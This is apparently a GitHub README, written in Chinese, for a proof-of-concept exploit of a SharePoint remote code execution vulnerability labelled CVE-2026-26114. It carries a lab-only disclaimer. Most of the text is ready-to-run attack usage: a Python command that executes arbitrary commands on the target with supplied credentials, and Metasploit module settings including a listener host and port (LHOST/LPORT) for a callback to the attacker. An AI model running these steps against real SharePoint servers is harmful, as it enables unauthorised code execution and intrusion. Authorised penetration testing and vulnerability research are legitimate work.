huynambka/cve-2026-26114-poc
GitHub: huynambka/cve-2026-26114-poc
针对 SharePoint CVE-2026-26114 远程代码执行漏洞的 PoC 工具,提供 Python 脚本和 Metasploit 模块两种利用途径。
Stars: 11 | Forks: 6
# CVE-2026-26114
仅供在实验室或授权测试系统中使用。
## Python PoC
```
pip install requests requests-ntlm
python poc/cve_2026_26114_rce.py ^
--target http://sharepoint.local ^
--username sp_user1 ^
--password "Password123!" ^
--domain SP19 ^
--cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"
```
可以使用 `--proxy http://127.0.0.1:8080`、`--insecure`,或者将 `--cmd` 替换为 `--marker-file C:\Windows\Temp\marker.txt`。
## Metasploit 模块
模块位于:
```
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb
```
选项示例:
```
use exploit/windows/http/sharepoint_cve_2026_26114
set RHOSTS sharepoint.local
set RPORT 80
set SSL false
set TARGETURI /
set USERNAME sp_user1
set PASSWORD Password123!
set DOMAIN SP19
set SRVHOST 192.168.56.1
set SRVPORT 8080
set LHOST 192.168.56.1
set LPORT 4444
check
run
```
如果不使用 auto-discovery,需额外设置 `TAXONOMY_STORE_ID`、`TAXONOMY_GROUP_ID`、`SITE_ID`、`WEB_ID`、`JOB_CREATOR_ID`。
标签:Python, 安全漏洞, 无后门, 逆向工具